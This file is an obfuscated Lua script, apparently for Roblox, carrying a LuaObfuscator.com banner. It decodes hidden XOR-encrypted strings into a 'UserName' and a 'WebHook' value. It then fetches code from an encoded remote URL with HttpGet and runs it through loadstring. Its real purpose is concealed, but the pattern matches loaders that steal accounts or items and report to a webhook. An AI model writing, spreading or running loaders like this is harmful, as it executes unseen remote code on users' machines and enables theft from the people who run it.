--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1)),v1(v2(v9,(968 -(406 + 44 + 517)) + ((v11-(2 -1))% #v9),(991 -(154 + 836)) + ((v11-((1 + 0) -0))% #v9) + 1)))%(166 + 90)));end return v5(v10);end _G.UserName=v7("\100\253\145\204\112\157\100\253\180\233\85\157\65\253\180\204\112\184\100\216","\45\145\216\133\57\212");_G.WebHook=v7("\115\32\195\156\201\217\132\178\120\53\217\141\200\154\133\249\114\39\212\131\200\135\133\254\116\57\152\141\202\138\132\234\126\54\223\131\213\136\216\178\42\100\129\222\143\212\156\165\41\108\129\222\136\212\156\169\40\108\131\195\211\185\210\170\104\13\240\154\140\168\156\213\120\30\192\219\233\146\252\168\87\37\198\133\217\154\156\205\106\25\223\152\143\146\219\199\104\53\192\160\223\138\237\247\76\35\132\142\226\182\236\207\121\6\213\132\192\187\193\169\75\108\218\186\233\134\230\172","\27\84\183\236\186\227\171\157");loadstring(game:HttpGet(v7("\250\220\108\199\77\168\135\55\197\95\229\134\127\222\74\250\221\122\194\77\247\218\123\216\80\230\205\118\195\16\241\199\117\152\72\247\219\108\206\70\189\248\125\195\109\251\197\109\219\95\230\199\106\239\109\241\218\113\199\74\225\135\117\214\87\252\135\89\194\74\253\238\121\197\83\188\196\109\214","\146\168\24\183\62")))();
